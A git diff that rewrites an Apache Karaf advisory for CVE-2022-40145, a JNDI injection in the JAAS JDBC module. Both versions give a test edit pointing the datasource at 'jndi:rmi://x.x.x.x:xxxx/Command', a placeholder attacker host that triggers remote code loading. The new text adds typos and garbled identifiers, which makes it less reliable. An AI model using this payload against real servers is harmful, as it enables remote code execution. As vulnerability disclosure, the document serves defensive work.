Update CVE-2022-40145 content
diff --git a/security/cve-2022-40145.txt b/security/cve-2022-40145.txt
index fd29009..540b374 100644
--- a/security/cve-2022-40145.txt
+++ b/security/cve-2022-40145.txt
@@ -13,15 +13,11 @@
Description:
-The method org.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource
-uses InitialContext.lookup(jndiName) without filtering.
-User can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" +
-DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,
-"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup.
+This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.
-This vulnerable to a remote code execution (RCE) attack when a
-configuration uses a JNDI LDAP data source URI when an attacker has
-control of the target LDAP server.
+The method jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasourceuse uses InitialContext.lookup(jndiName) without filtering.
+An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup.
+This is vulnerable to a remote code execution (RCE) attack when aconfiguration uses a JNDI LDAP data source URI when an attacker hascontrol of the target LDAP server.
This has been fixed in revision:
